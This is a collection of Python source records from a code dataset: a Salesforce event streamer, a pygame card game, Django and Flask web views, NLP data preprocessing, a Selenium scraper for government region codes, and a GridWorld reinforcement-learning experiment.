sorted(creds_js[\"streams\"])\n\n replay_id = args.replay_id - 1 if args.replay_id > 0 else args.replay_id\n print(f\"Using replay_id: {replay_id}\")\n replay_marker = ReplayMarker(replay_id=replay_id, date=\"\")\n replay = {}\n for stream in streams:\n replay[stream] = replay_marker\n starttime = datetime.datetime.now()\n\n async with SalesforceStreamingClient(\n consumer_key=creds_js[\"consumer_key\"],\n consumer_secret=creds_js[\"consumer_secret\"],\n username=creds_js[\"username\"],\n password=creds_js[\"password\"],\n replay=replay) as client:\n\n # subscribe to topics\n for stream in streams:\n print(f\"Connecting to: {stream}\")\n await client.subscribe(stream)\n print(f\"Connected to: {stream}\")\n\n # listen for incoming messages\n count = 0\n last_table_data = None\n period_start = datetime.datetime.now()\n period_count = 1\n changes = collections.defaultdict(int)\n async for message in client:\n if args.limit != -1 and count >= args.limit:\n break\n count += 1\n topic = message[\"channel\"]\n data = message[\"data\"]\n changes[topic] += 1\n if args.monitor:\n if count % args.number == 0:\n period_count += 1\n table_data = [[\"stream\", \"replay_id\", \"changes\"]]\n for stream in streams:\n marker = replay[stream]\n last_replay_id = last_table_data[len(table_data)][1] if last_table_data else -1\n table_data.append([stream, marker.replay_id, changes[stream]])\n table = AsciiTable(table_data)\n last_table_data = table_data\n print(\"\\033[2J\")\n print(\"\\033[0;0H\")\n period_end = datetime.datetime.now()\n uptime = period_end - starttime\n period_time = period_end - period_start\n period_start = period_end\n print(f\"Uptime: {uptime}, Period #{period_count}, Period time: {period_time}\")\n print(table.table)\n changes = collections.defaultdict(int)\n else:\n js = json.dumps(data, indent=4)\n print(f\"{topic}: {js}\")\n print(f\"replay: {replay}\")\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-c\", \"--credentials\", type=str, help=\"name of file in ~/.private directory containin login info and list of streams to connect to\")\n parser.add_argument(\"-m\", \"--monitor\", help=\"monitor number of CDC events received\", action=\"store_true\")\n parser.add_argument(\"-r\", \"--replay_id\", type=int, default=-1, help=\"first replay id to fetch\")\n parser.add_argument(\"-l\", \"--limit\", type=int, default=-1, help=\"number of events to show (-1 is infinite)\")\n parser.add_argument(\"-n\", \"--number\", type=int, default=1, help=\"number of events before refreshing monitor table\")\n parser.add_argument(\"-s\", \"--seconds\", type=int, default=1, help=\"number of seconds before refreshing monitor table\")\n args = parser.parse_args()\n\n loop = asyncio.get_event_loop()\n loop.run_until_complete(stream_events())\n\n","sub_path":"cdc_util.py","file_name":"cdc_util.py","file_ext":"py","file_size_in_byte":3758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"533284292","text":"import Card_Class\nimport pygame\nfrom pygame.locals import *\nimport sys\nimport card_generator\nimport View\nimport player_class\nimport random\n\npygame.init()\n\n\nclass Controller:\n\n def __init__(self):\n #This is all of the variables that we use to set up things like changing state, running size, and keeping track of current card\n self.card_list = card_generator.card_generator()\n self.player_card_list = card_generator.card_generator()\n self.AI_card_list = card_generator.card_generator()\n self.clock = pygame.time.Clock()\n self.size = width,height = (1900,1000)\n self.screen=pygame.display.set_mode(self.size)\n self.view = View.view()\n self.current_card = 0\n self.card_to_attack = 0\n self.player = player_class.player()\n self.AI = player_class.player()\n #self.AI.Hand = self.card_list\n print(self.AI.Hand)\n self.MENU_STATE = False\n self.PICK_HAND_STATE = True\n self.LOGIN_STATE = False\n self.GAME_STATE = True\n self.RESULT_STATE = False\n self.PLAYER_TURN_STATE = True\n self.AI_TURN_STATE = False\n self.BATTLE_STATE = True\n self.AI_BATTLE_STATE = False\n self.MAIN_PHASE = False\n self.AI_MAIN_PHASE = False\n\n while True:\n\n #Runs the pick hand window in the program and stores the rendered cards\n if self.PICK_HAND_STATE:\n self.view.run_pick_hand(self.screen, self.size, self.current_card, self.card_list)\n #Runs the game window in the program\n if self.GAME_STATE:\n self.view.run_game(self.screen,self.size,self.current_card,self.player,self.AI)\n self.player.Deck = self.player_card_list\n self.AI.Deck = self.AI_card_list\n self.player.draw()\n self.AI.draw()\n\n #Event handler\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n if event.type == pygame.KEYDOWN and event.key == pygame.K_RIGHT:\n #Moves the current card tracker to the right\n if self.PICK_HAND_STATE:\n #This code only works in the selecting cards screen\n if self.current_card != (len(self.card_list)-1):\n print(self.card_list[self.current_card].name)\n if self.current_card >= 0 and self.current_card <= (len(self.card_list)-1):\n self.current_card += 1\n elif self.GAME_STATE:\n #This code only works in the game screen\n if self.current_card != (len(self.player.Hand)-1):\n print(self.player.Hand[self.current_card].name)\n if self.current_card >= 0 and self.current_card <= (len(self.player.Hand)-1):\n self.current_card += 1\n\n if event.type == pygame.KEYDOWN and event.key == pygame.K_LEFT:\n #Moves the current card tracker to the left\n if self.PICK_HAND_STATE:\n #This code only works in the selecting card screen\n if self.current_card != (len(self.card_list)-1):\n print(self.card_list[self.current_card].name)\n if self.current_card >= 0 and self.current_card <= (len(self.card_list)-1):\n self.current_card -= 1\n elif self.GAME_STATE:\n #This code only works in the game screen\n if self.current_card != (len(self.player.Hand)-1):\n print(self.player.Hand[self.current_card].name)\n if self.current_card >= 0 and self.current_card <= (len(self.player.Hand)-1):\n self.current_card -= 1\n\n if event.type == pygame.KEYDOWN and event.key == pygame.K_z:\n #When the user presses z, this moves the card from hand to field in game in attack position\n if self.GAME_STATE == True:\n if self.PLAYER_TURN_STATE == True:\n if self.player.Field_Limit():\n if not len(self.player.Hand) == 0:\n card = self.player.Hand.pop(self.current_card)\n card.in_play = True\n card.attack = True\n self.player.Field.append(card)\n self.current_card = 0\n\n if event.type == pygame.KEYDOWN and event.key == pygame.K_x:\n #When the user presses x, this moves the card from hand to field in defense position\n if self.GAME_STATE == True:\n if self.PLAYER_TURN_STATE == True:\n if self.player.Field_Limit():\n if not len(self.player.Hand) == 0:\n card = self.player.Hand.pop(self.current_card)\n card.in_play = True\n card.attack = False\n self.player.Field.append(card)\n self.current_card = 0\n\n if event.type == pygame.KEYDOWN and event.key == pygame.K_SPACE:\n #When the user presses space, this ends the player's turn and makes the AI attack\n if self.PLAYER_TURN_STATE == True:\n if self.GAME_STATE == True:\n if self.MAIN_PHASE == True:\n self.MAIN_PHASE = False\n elif self.BATTLE_STATE == True:\n self.BATTLE_STATE = False\n self.AI_TURN_STATE = True\n self.AI_MAIN_PHASE = True\n print(\"Player ended turn=======================================================================\")\n\n if event.type == pygame.KEYDOWN and event.key == pygame.K_TAB:\n #When the user presses tab, this changes scenes (ex.main menu to card selecting and then to game)\n if self.MENU_STATE == True:\n self.PICK_HAND_STATE == True\n self.MENU_STATE = False\n self.view.loading(self.screen)\n if self.PICK_HAND_STATE == True:\n #Should lock in the deck you chose for the game.\n #Then goes to GAME_STATE\n self.GAME_STATE = True\n self.PICK_HAND_STATE = False\n self.view.loading(self.screen)\n self.current_card = 0\n\n\n #This is the code that the AI uses to attack\n if self.AI_TURN_STATE == True:\n if self.AI_MAIN_PHASE == True:\n if self.AI.Field_Limit():\n #Randomly selects a card to use, sets it to attack and then puts it on the field\n if not len(self.AI.Hand) == 0:\n self.current_card = random.randrange(6)\n card = self.AI.Hand.pop(self.current_card)\n card.in_play = True\n card.attack = True\n self.AI.Field.append(card)\n self.current_card = 0\n self.AI.draw()\n self.AI_MAIN_PHASE = False\n self.AI_BATTLE_STATE = True\n if self.AI_BATTLE_STATE == True:\n self.current_card = random.randrange(len(self.AI.Field))\n self.card_to_attack = random.randrange(len(self.player.Field))\n #This part determines what happens to the player's health when the AI attacks\n result = self.player.attack_card(self.AI.Hand[self.current_card], self.player.Hand[self.card_to_attack])\n if result > 0:\n self.player.Health = self.player.Health - result\n elif result < 0:\n self.player.Health = self.player.Health + result\n self.AI_BATTLE_STATE = False\n self.AI_TURN_STATE = False\n self.PLAYER_TURN_STATE = True\n self.BATTLE_STATE = True\n print(\"AI ended turn==========================================================================================\")\n\n\n #This gets printed out when the player or the AI dies and the game is over\n if self.player.Health <= 0:\n print(\"Game Over\")\n if self.AI.Health <= 0:\n print(\"You Won!\")\n\n pygame.display.update()\n self.clock.tick(60)\n","sub_path":"Controller.py","file_name":"Controller.py","file_ext":"py","file_size_in_byte":9177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"30051891","text":"from django.template.context_processors import request\nfrom index.forms import SubscribeForm, BookingTourForm, BookingRoomForm, ContactForm\nfrom index.models import Comment, Category\nfrom sitesettings.models import Social, Contact, Partner, Deal, Hotlink\n\ndef index(request):\n\tcontact_form = ContactForm()\n\tsubscribe_form = SubscribeForm()\n\tbooking_tour_form = BookingTourForm()\n\tbooking_room_form = BookingRoomForm()\n\n\tcomments = Comment.objects.all()\n\tsocials = Social.objects.all()\n\tcontact = Contact.objects.first()\n\tpartners = Partner.objects.all()\n\tdeals = Deal.objects.all()\n\thotlinks = Hotlink.objects.all()\n\n\tcategories = Category.objects.all()\n\n\treturn {\n\t\t'contact_form' : contact_form,\n\t\t'subscribe_form' : subscribe_form,\n\t\t'booking_tour_form' : booking_tour_form,\n\t\t'booking_room_form' : booking_room_form,\n\n\t\t'comments' : comments,\n\t\t'socials' : socials,\n\t\t'contact' : contact,\n\t\t'partners' : partners,\n\t\t'deals' : deals,\n\t\t'hotlinks' : hotlinks,\n\n\t\t'categories' : categories\n\t}","sub_path":"index/context_processors/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"359301642","text":"from flask import Flask, render_template, jsonify, request\nfrom flask_sqlalchemy import SQLAlchemy\nfrom app import app, db\nfrom models import Stats\n\n\n@app.route('/', defaults={'path': ''})\n@app.route('/')\ndef any_root_path(path):\n stats = Stats.reset_stats()\n return render_template('index.html')\n\n\n@app.route(\"/api/get_growth_data\", methods=[\"GET\"])\ndef get_growth_data():\n stats = Stats.get_stats()\n return jsonify(stats=stats)\n\n@app.route(\"/api/update_growth_data\", methods=[\"POST\"])\ndef update_growth_data():\n incoming = request.get_json()\n updateStat = Stats.update_data(incoming)\n stats = Stats.get_stats()\n return jsonify(stats=stats,error=updateStat)\n\n@app.route(\"/api/remove_growth_data\", methods=[\"POST\"])\ndef remove_growth_data():\n incoming = request.get_json()\n rmStat = Stats.remove_data(incoming['name'])\n stats = Stats.get_stats()\n return jsonify(stats=stats,error=rmStat)\n\n","sub_path":"routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"238182528","text":"import random\n\nrandom.seed(0)\nfin = open(\"dataset/web_reviews/psst-tokens.tsv\",'r')\n\ndata=fin.readlines()\n\nx_tups = []\n\nfor line in data:\n\twords = line.strip(\"\\n\").strip().split(\"\\t\")\n\tlid = words[0].strip()\n\tprep = words[1].strip().split()\n\tsense = words[2].strip()\n\tsentence = words[3].strip()\n\n\tsent_split = sentence.split(\"|\")\n\tleft_context = sent_split[0].strip().split()\n\tright_context = sent_split[-1].strip().split()\n\n\ttup = (lid, prep, left_context, right_context, sense)\n\n\tx_tups.append(tup)\n\n\nprint(\"input taken in. size is - \", len(x_tups))\n#calc. uniques\n\nuniques = set()\n\nu_ids = set()\nu_senses = set()\n\nfor tup in x_tups:\n\t\n\tu_ids.add(tup[0])\n\tu_senses.add(tup[-1])\n\tall_words = tup[1] + tup[2] + tup[3]\n\tfor word in all_words:\n\t\tfinal_word = word.lower()\n\t\tuniques.add(final_word)\n\nprint(\"unique_ids are - \", len(u_ids))\nprint(\"unique senses are - \", len(u_senses))\n#from word vectors file\n\n\nfilevec = \"word_vectors/glove.6B.50d.txt\"\ndimensions = 50\nword_vectors = []\n\nwith open(filevec,\"r\") as fin:\n\tfor line in fin:\n\t\twords = line.strip(\"\\n\").strip().split()\n\t\tif(len(words) == (dimensions + 1)):\n\t\t\tword_vectors.append(words[0])\n\n#checking in word vectors file.\nfound = 0\ntotal = 0\n\nfor word in uniques:\n\ttotal += 1\n\tif word in word_vectors:\n\t\tfound += 1\n\nprint(\"vocab size is - \", total, \"found vectors for - \", found)\n\nu_senses = list(u_senses)\n\nsense2id = {}\nid2sense = {}\n\nfor i in range(len(u_senses)):\n\tsense2id[u_senses[i]] = i\n\tid2sense[i] = u_senses[i]\n\nuniques = list(uniques)\n\nw2id = {}\nid2w = {}\n\nfor i in range(len(uniques)):\n\tw2id[uniques[i]] = i\n\tid2w[i] = uniques[i]\n\nw2id[\"\"] = len(uniques)\nid2w[len(uniques)] = \"\"\n\nx_tups_again = []\n\nfor tup in x_tups:\n\tprepn = []\n\tfor w in tup[1]:\n\t\tprepn.append(w2id[w.lower()])\n\n\tlcn = []\n\tfor w in tup[2]:\n\t\tlcn.append(w2id[w.lower()])\n\n\trcn = []\n\tfor w in tup[3]:\n\t\trcn.append(w2id[w.lower()])\n\n\tsensen = sense2id[tup[4]]\n\n\tx_tups_again.append((tup[0], prepn, lcn, rcn, sensen))\n\nx_tups = x_tups_again\n\n\n#sentMax padding\nsentMax = -1\n\n\n\n#process x_tups by converting everything into ids.\n#finally I have w2id, id2w, sense2id, and x_tups with same form but all replaced with ids.\n\n#now divide in train,test, dev.\n\nftest = open(\"dataset/web_reviews/psst-test.sentids\", \"r\")\n\ntest_ids = ftest.readlines()\n\ntest_set_ids = []\n\nids_considered = set()\n\nfor tid in test_ids:\n\ttid = tid.strip(\"\\n\").strip()\n\n\ttest_set_ids.append(tid)\n\nx_tups_test = []\nx_tups_train = []\n\nfor tup in x_tups:\n\tif(tup[0].split(\":\")[0] in test_set_ids) and (tup[0].split(\":\")[0] not in ids_considered):\n\t\tx_tups_test.append(tup)\n\t\tids_considered.add(tup[0].split(\":\")[0])\n\telse:\n\t\tx_tups_train.append(tup)\n\nrandom.shuffle(x_tups_train)\n\nx_tups_dev = x_tups_train[:450]\nx_tups_train = x_tups_train[450:]\n\nrandom.shuffle(x_tups_train)\nrandom.shuffle(x_tups_dev)\nrandom.shuffle(x_tups_test)\n\nprint(\"different datasets prepared. sizes are - \", len(x_tups_train), len(x_tups_dev), len(x_tups_test))\n\n","sub_path":"src/data_preprocessing.py","file_name":"data_preprocessing.py","file_ext":"py","file_size_in_byte":2951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"377515730","text":"from ..models.person import Person\nfrom ..serializers.person import PersonSerializer\n\nfrom django.http import Http404\nfrom ..serializers.person import PersonSerializer\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import status\n\nfrom django.db.models import Q\n\n\nclass PersonView(APIView):\n \"\"\"\n Person view \n \"\"\"\n serializer_class = PersonSerializer\n\n def get(self, request, id, format=None):\n if(id > 0):\n person = Person.objects.get(pk=id)\n serializer = PersonSerializer(person)\n else:\n person = Person()\n person.save()\n serializer = PersonSerializer(person)\n return Response(serializer.data)\n\n\nclass AllPersonsView(APIView):\n\n \"\"\"\n Fetch All Person items\n \"\"\"\n\n def get(self, request):\n persons = Person.objects.all()\n serializer = PersonSerializer(persons, many=True)\n return Response(serializer.data)\n\n\nclass SavePersonView(APIView):\n \"\"\"\n Save Person view \n \"\"\"\n serializer_class = PersonSerializer\n\n def post(self, request, format=None):\n id = request.data['id']\n person = Person.objects.get(pk=id)\n serializer = PersonSerializer(person, request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_200_OK)\n else:\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass PersonSearchView(APIView):\n \"\"\"\n Search Person[] view \n \"\"\"\n serializer_class = PersonSerializer\n\n def get(self, request, format=None):\n query = request.query_params.get('query')\n query_cap = query.capitalize()\n\n by_name = Q(name__icontains=query)\n by_cap_name = Q(name__icontains=query_cap)\n by_code = Q(rail_code__icontains=query)\n by_street_house = Q(street_house__icontains=query)\n by_cap_street_house = Q(street_house__icontains=query_cap)\n filtered_persons = Person.objects.filter(\n by_code | by_name | by_cap_name | by_street_house | by_cap_street_house)\n\n serializer = PersonSerializer(filtered_persons, many=True)\n return Response(serializer.data)\n","sub_path":"rest/views/person.py","file_name":"person.py","file_ext":"py","file_size_in_byte":2274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"639147771","text":"import pandas as pd\nfrom pandas import ExcelWriter\n#from pandas import ExcelFile\nimport numpy as np\n\n'''\nimport pandas\nwriter = pandas.ExcelWriter('Masterfile.xlsx')\ndata_filtered.to_excel(writer, \"Main\", cols=['Diff1', 'Diff2'])\nwriter.save()\n\n# -------------------------\nimport pandas\nfrom openpyxl import load_workbook\n\nbook = load_workbook('Masterfile.xlsx')\nwriter = pandas.ExcelWriter('Masterfile.xlsx', engine='openpyxl')\nwriter.book = book\nwriter.sheets = dict((ws.title, ws) for ws in book.worksheets)\ndata_filtered.to_excel(writer, \"Main\", cols=['Diff1', 'Diff2'])\nwriter.save()\n\n'''\ns1 = '1001:fgwukjoipqvujse0xfhybd5h6200,Pallet Rexroth circulation roller bearing NP60 NP60 EC'\ns2 = '1002:fgwukjoipqvujse0xfhybd5h6200, FAG Pallet stop arm bearing with RHP or Rexworth MNR R162472220'\ns3 = '1003:y1mowwdcd1wwng3pajoxjbff68700,TIMKEN BEARING (WHEEL) Q2019-058 Sheen Spark Q2019-058'\ns4 = '1004:fi2r11ncqz3ldgo2gfryducd67104,FYTWK30YTH-* SKF cancelled po RHP, NSK do not use this line cancelled po do not use this line cancelled po do not use this line'\ns5 = '1005:0M80-8KDJ93,7216 bep Bearing N/A N/A or maybe TIMKEN'\ns6 = '1005:0M80-8KDJ93,7216 bert Bearing N/A N/A or maybe TUMKEN'\ns7 = 'Gimme some of that SKF !'\n\nstrings = [s1, s2, s3, s4, s5, s6, s7]\nmanuf_list = ['Rexroth','SKF', 'NSK', 'RHP', 'TIMKEN', 'FAG', 'Sheen Spark', 'bep']\nw_Manufs = []\nw_Manuf_Alts = []\nmanuf = ''\nalts = ''\n\nj = 1\nfor str in strings:\n i = 0\n for m in manuf_list:\n # case: if there's a manuf in the string\n loc = str.find(m, 0)\n if loc > 0:\n if i == 0:\n # if it's the first manuf in the sentence, put it in w_Manufs\n manuf = m\n i += 1\n else:\n # if it's not the first manuf in the sentence, put it in alts\n if alts == '':\n alts = m\n else:\n alts = alts + ', ' + m\n else:\n continue\n\n w_Manufs.append(manuf.upper())\n w_Manuf_Alts.append(alts.upper())\n\n # test ---------------\n print('str ', j, 'w_Manufs: ', w_Manufs)\n print('str ', j, 'w_Manuf_Alts: ', w_Manuf_Alts)\n # test ---------------\n\n manuf = ''\n alts = ''\n j += 1\n\ndf = pd.DataFrame({'w_Manuf':w_Manufs,\n 'w_Manuf_Alt':w_Manuf_Alts})\n\nwriter = pd.ExcelWriter('demo_pandas_manufs.xlsx')\ndf.to_excel(writer,'NERS_Manufs', index=False)\nwriter.save()\n","sub_path":"store/model/brmr_erp1/pandas_test.py","file_name":"pandas_test.py","file_ext":"py","file_size_in_byte":2442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"314799810","text":"from selenium import webdriver\nimport pymysql\n\nclass GovSpider(object):\n def __init__(self):\n self.url = 'http://www.mca.gov.cn/article/sj/xzqh/2019/'\n # 设置无界面模式\n self.options = webdriver.ChromeOptions()\n self.options.add_argument('--headless')\n self.browser = webdriver.Chrome(options=self.options)\n self.db = pymysql.connect(\n 'localhost','root','123456','govdb',charset='utf8'\n )\n self.cursor = self.db.cursor()\n # 用于executemany([(),(),()])\n self.province = []\n self.city = []\n self.county = []\n\n # 提取数据\n def get_data(self):\n self.browser.get(self.url)\n node = self.browser.find_element_by_partial_link_text('县以上行政区划代码')\n # 先判断此节点之前是否抓取过\n link = node.get_attribute('href')\n sel = 'select url from version where url=%s'\n result = self.cursor.execute(sel,[link])\n if not result:\n # 1.抓取\n self.get_code(node)\n # 2.把此链接存入数据库version表中\n ins = 'insert into version values(%s)'\n self.cursor.execute(ins,[link])\n self.db.commit()\n else:\n print('未更新')\n\n # 具体抓取数据\n def get_code(self,node):\n node.click()\n # 切换句柄\n all = self.browser.window_handles\n self.browser.switch_to.window(all[1])\n # 提取数据\n tr_list = self.browser.find_elements_by_xpath('//tr[@height=\"19\"]')\n for tr in tr_list:\n name = tr.text.split()[1]\n code = tr.text.split()[0]\n print(name,code)\n # 上海市 上海市 浦东新区\n if code[-4:] == '0000':\n self.province.append((name,code))\n # 把4个直辖市添加到city表\n if code[:2] in ['11','12','31','50']:\n self.city.append((name,code,code))\n\n elif code[-2:] == '00':\n pcode = code[:2] + '0000'\n self.city.append((name,code,pcode))\n # 记录最近1次的市的编号\n last_city = code\n else:\n if code[:2] in ['11','12','31','50']:\n ccode = code[:2] + '0000'\n else:\n ccode = last_city\n self.county.append((name,code,ccode))\n\n self.insert_mysql()\n\n def insert_mysql(self):\n # 1.先清除原有数据\n del1 = 'delete from province'\n del2 = 'delete from city'\n del3 = 'delete from county'\n self.cursor.execute(del1)\n self.cursor.execute(del2)\n self.cursor.execute(del3)\n self.db.commit()\n # 2.插入新的数据\n ins1 = 'insert into province values(%s,%s)'\n ins2 = 'insert into city values(%s,%s,%s)'\n ins3 = 'insert into county values(%s,%s,%s)'\n self.cursor.executemany(ins1,self.province)\n self.cursor.executemany(ins2,self.city)\n self.cursor.executemany(ins3,self.county)\n self.db.commit()\n\n def run(self):\n self.get_data()\n self.browser.quit()\n\nif __name__ == '__main__':\n spider = GovSpider()\n spider.run()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"spider爬虫/day08/04_gov.py","file_name":"04_gov.py","file_ext":"py","file_size_in_byte":3303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"79104802","text":"# -*- coding: utf-8 -*-\nimport json\nimport hashlib\nimport logging\nimport re\nimport requests\n\nfrom django.views.decorators.http import require_GET, require_POST\nfrom django.conf import settings\n\nfrom luckycommon.third.image import get_token, delete_data_by_key\nfrom luckycommon.order.db import order as order_db\nfrom luckycommon.order.model.order import AwardedOrder, ORDER_STATUS\n\nfrom luckycommon.utils.api import token_required\nfrom luckycommon.utils.decorator import response_wrapper\nfrom luckycommon.utils.exceptions import DataError, ParamError\n\n_LOGGER = logging.getLogger('lucky')\n\n\n@require_GET\n@response_wrapper\n@token_required\ndef get_qiniu_token(req):\n bucket_name = settings.USER_BUCKET_NAME\n token = get_token(bucket_name, expires=3600)\n return {\"token\": token, \"host\": settings.QINIU_DOMAIN,\n \"bucket\": bucket_name}\n\n\n@require_POST\n@response_wrapper\n@token_required\ndef delete_data(req):\n query_dct = json.loads(req.body)\n bucket_name = settings.USER_BUCKET_NAME\n keys = query_dct.get('keys', [])\n assert isinstance(keys, list)\n if keys:\n delete_data_by_key(keys, bucket_name)\n\n return {}\n\n@require_GET\n@response_wrapper\ndef datacell_f(req):\n _LOGGER.error('It seems Datacell Fail, %s', req.body)\n return {}\n\n\n@response_wrapper\ndef datacell_s(req):\n _LOGGER.error('It seems Datacell , %s', req.body)\n return {}\n\n@response_wrapper\ndef mobilepulsa(req):\n _LOGGER.info('It seems pulsa , %s, %s, %s', req.body, req.GET,req.POST)\n if '2' in req.body:\n l = re.compile(r'\\.*\\<\\/ref_id')\n p = l.search(req.body)\n if p:\n order_id = int(p.group()[8:-8])\n _LOGGER.error('beiju, pulsa charge fail, %s', order_id)\n # order_db.update_order_info(\n # order_id,\n # {'status': ORDER_STATUS.AWARDED}, None, True\n # )\n return {}\n\n\n@require_GET\n@response_wrapper\ndef bluepay(req):\n _LOGGER.error('It seems Bluepay, %s', req.GET)\n return {'status':200}\n","sub_path":"luckyapi/views/third.py","file_name":"third.py","file_ext":"py","file_size_in_byte":2047,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"622898873","text":"#!/usr/bin/env python\n\nfrom segmentcentroid.envs.GridWorldEnv import GridWorldEnv\nfrom segmentcentroid.tfmodel.GridWorldMiddleModel import GridWorldMiddleModel\nfrom segmentcentroid.planner.value_iteration import ValueIterationPlanner\nfrom segmentcentroid.planner.traj_utils import *\n\nimport numpy as np\nimport copy\n\nimport tensorflow as tf\n\ndef inRoom1(state):\n return (state[1] <= 3) \n\ndef inRoom2(state):\n return (state[1] > 16) \n\n#two rooms start end \n\ndef runPolicies(demonstrations=20,\n super_iterations=2000,\n sub_iterations=0,\n learning_rate=10,\n env_noise=0.3):\n\n m = GridWorldMiddleModel(2, statedim=(10,20))\n\n MAP_NAME = 'resources/GridWorldMaps/experiment1.txt'\n gmap = np.loadtxt(MAP_NAME, dtype=np.uint8)\n full_traj = []\n vis_traj = []\n\n for i in range(0,demonstrations):\n print(\"Traj\",i)\n g = GridWorldEnv(copy.copy(gmap), noise=env_noise)\n\n start = np.argwhere(g.map == g.START)[0]\n goal = np.argwhere(g.map == g.GOAL)[0]\n #generate trajectories start in same room and end different room\n while not ((inRoom1(start) and inRoom2(goal)) or\\\n (inRoom2(start) and inRoom1(goal))):\n g.generateRandomStartGoal()\n start = np.argwhere(g.map == g.START)[0]\n goal = np.argwhere(g.map == g.GOAL)[0]\n\n\n print(np.argwhere(g.map == g.START), np.argwhere(g.map == g.GOAL))\n\n v = ValueIterationPlanner(g)\n traj = v.plan(max_depth=100)\n \n new_traj = []\n for t in traj:\n a = np.zeros(shape=(4,1))\n\n s = np.zeros(shape=(10,20))\n\n a[t[1]] = 1\n\n s[t[0][0],t[0][1]] = 1\n #s[2:4,0] = np.argwhere(g.map == g.START)[0]\n #s[4:6,0] = np.argwhere(g.map == g.GOAL)[0]\n\n new_traj.append((s,a))\n\n full_traj.append(new_traj)\n vis_traj.extend(new_traj)\n\n #raise ValueError(\"\")\n\n #g.visualizePlan(vis_traj,blank=True, filename=\"resources/results/exp1-trajs.png\")\n\n\n m.sess.run(tf.initialize_all_variables())\n\n with tf.variable_scope(\"optimizer\"):\n opt = tf.train.GradientDescentOptimizer(learning_rate=learning_rate)\n\n m.train(opt, full_traj, super_iterations, sub_iterations)\n\n actions = np.eye(4)\n\n\n g = GridWorldEnv(copy.copy(gmap), noise=0.1)\n g.generateRandomStartGoal()\n\n for i in range(m.k):\n states = g.getAllStates()\n policy_hash = {}\n trans_hash = {}\n\n for s in states:\n\n t = np.zeros(shape=(10,20))\n\n t[s[0],s[1]] = 1\n #t[2:4,0] = np.argwhere(g.map == g.START)[0]\n #t[4:6,0] = np.argwhere(g.map == g.GOAL)[0]\n\n\n l = [ np.ravel(m.evalpi(i, [(t, actions[j,:])] )) for j in g.possibleActions(s)]\n\n if len(l) == 0:\n continue\n\n #print(i, s,l, m.evalpsi(i,ns))\n action = g.possibleActions(s)[np.argmax(l)]\n\n policy_hash[s] = action\n\n #print(\"Transition: \",m.evalpsi(i, [(t, actions[1,:])]), t)\n trans_hash[s] = np.ravel(m.evalpsi(i, [(t, actions[1,:])]))\n\n g.visualizePolicy(policy_hash, trans_hash, blank=True, filename=\"resources/results/exp1b-policy\"+str(i)+\".png\")\n\n\n\n\n","sub_path":"segmentcentroid/experiments/experiment1b.py","file_name":"experiment1b.py","file_ext":"py","file_size_in_byte":3255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"486479699","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('push_backends', '0007_auto_20140923_1129'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='mailchimppushbackend',\n name='test_emails',\n field=models.CharField(default='', max_length=512),\n preserve_default=False,\n ),\n ]\n","sub_path":"apps/push_backends/migrations/0008_mailchimppushbackend_test_emails.py","file_name":"0008_mailchimppushbackend_test_emails.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"82005909","text":"# -*- coding: utf-8 -*-\n##----------------------------------------------------------------------\n## Settings model\n##----------------------------------------------------------------------\n## Copyright (C) 2007-2015 The NOC Project\n## See LICENSE for details\n##----------------------------------------------------------------------\n\n# Python modules\nimport base64\nimport json\n\nimport os\n\n# Third-party modules\nfrom peewee import Model, CharField, TextField, DoesNotExist\n# Tower modules\nfrom db import db\n\n\nclass Settings(Model):\n class Meta:\n database = db\n db_table = \"settings\"\n\n key = CharField(primary_key=True)\n value = TextField()\n\n DEFAULTS = {\n \"url\": \"http://example.com/\",\n \"repo_url\": \"http://example.com/hg\",\n \"installation_name\": \"Unconfigured installation\"\n }\n\n @classmethod\n def get_item(cls, name):\n with db.atomic():\n try:\n return json.loads(\n Settings.get(Settings.key == name).value\n )\n except DoesNotExist:\n raise KeyError\n\n @classmethod\n def get_items(cls, names):\n r = {}\n with db.atomic():\n for s in Settings.select().where(Settings.key << list(names)):\n r[s.key] = json.loads(s.value)\n return r\n\n @classmethod\n def set_item(cls, name, value):\n value = json.dumps(value)\n with db.atomic():\n r = list(Settings.select().where(Settings.key == name))\n if len(r) == 0:\n r = Settings(\n key=name,\n value=value\n )\n r.save(force_insert=True)\n else:\n # Update\n r[0].value = value\n r[0].save()\n\n @classmethod\n def get_cookie_secret(cls):\n try:\n return Settings.get_item(\"cookie_secret\")\n except KeyError:\n secret = base64.b64encode(os.urandom(64))\n Settings.set_item(\"cookie_secret\", secret)\n return secret\n\n @classmethod\n def get_url(cls):\n \"\"\"\n Return tower's URL\n :return:\n \"\"\"\n try:\n return Settings.get_item(\"url\")\n except KeyError:\n return 